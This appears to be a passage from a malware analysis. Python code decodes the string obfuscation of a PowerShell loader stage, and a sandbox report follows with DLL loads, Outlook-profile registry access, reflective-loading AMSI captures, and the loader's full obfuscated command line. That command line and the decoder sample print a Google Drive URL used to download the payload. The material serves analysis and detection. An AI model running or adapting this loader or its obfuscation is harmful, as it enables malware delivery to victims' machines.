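START, STEP = 5, 6


def deobfuscate(blob: str, start: int = START, step: int = STEP) -> str:
    """Replicate Skftendes: keep blob[i] for i = start, start+step, ... while i < len(blob) - 1."""
    return "".join(blob[i] for i in range(start, len(blob) - 1, step))


_FILLER = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def obfuscate(plain: str, seed: int = 1, step: int = STEP) -> str:
    """Constructed encoder (not recovered from the sample) that emits literals of the same shape:
    five filler letters before each real character, then a final filler chunk ending in a space."""
    rng = random.Random(seed)

    def filler() -> str:
        return "".join(rng.choice(_FILLER) for _ in range(step - 1))

    return "".join(filler() + ch for ch in plain) + filler() + " "


DECODER_CALL = re.compile(r"Skftendes\s+'([^']*)'")


def decode_script(script: str) -> list[str]:
    """Return the decoded value of every literal passed to Skftendes, in script order."""
    return [deobfuscate(lit) for lit in DECODER_CALL.findall(script)]


# $Aaretags as it appears in the report's command line (no runs of spaces, so it survived extraction).
AARETAGS_LITERAL = "Kn gliFlereeNeutrx Azim "

# $ergometercykelen as printed on this page, and the same literal with one space restored after
# "Samtie". The repair is an assumption (the report rendering collapsed a double space); only the
# repaired form decodes to the header name the report's HTTP traffic shows.
ERGOMETER_AS_PRINTED = "Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor "
ERGOMETER_REPAIRED = "Fors UCystosSamtie  olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor "

# Constructed excerpt in the shape of the stage: the real $Aaretags literal plus an obfuscated copy
# (this encoder's output, not the sample's) of the Drive URL seen in the report's traffic.
DRIVE_URL = "https://drive.google.com/uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb"
SAMPLE_SCRIPT = (
    f"$Aaretags=Skftendes '{AARETAGS_LITERAL}';"
    f"$Enebrrets=Skftendes '{obfuscate(DRIVE_URL)}';"
    "function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}"
)

if __name__ == "__main__":
    for name, value in zip(("$Aaretags", "$Enebrrets"), decode_script(SAMPLE_SCRIPT)):
        print(f"{name} -> {value!r}")
    print("as printed:", repr(deobfuscate(ERGOMETER_AS_PRINTED)),
          "repaired:", repr(deobfuscate(ERGOMETER_REPAIRED)))
```

Because the real character is always at a fixed offset inside a fixed-width chunk, the scheme is a transposition with no key: the start index and stride are the only parameters, and both are visible in the For loop of the stage, so the same two numbers recover every literal in the script.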
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.1525931065.000000000810E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbU source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000005.00000002.1528395675.000000000CC71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1518186939.000000000585C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1732568845.000000000557B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1527620417.0000000008620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Tapmost)$global:Lnligst = [System.Text.Encoding]::ASCII.GetString($Trkkenaalen)$global:Wairs=$Lnligst.substring(309815,28440)<#Lyrikere frihandelen Extraclassroom Premeridian Ip #>$E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Skumsprjtene $Erindringer $Skillevggene), (Spisehuses @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fyrreaarsfdselsdagenes = [AppDomain]::CurrentDomain.G
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Vaskomatens)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Retssikkerhed, $false).DefineType($Maximus, $
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. 
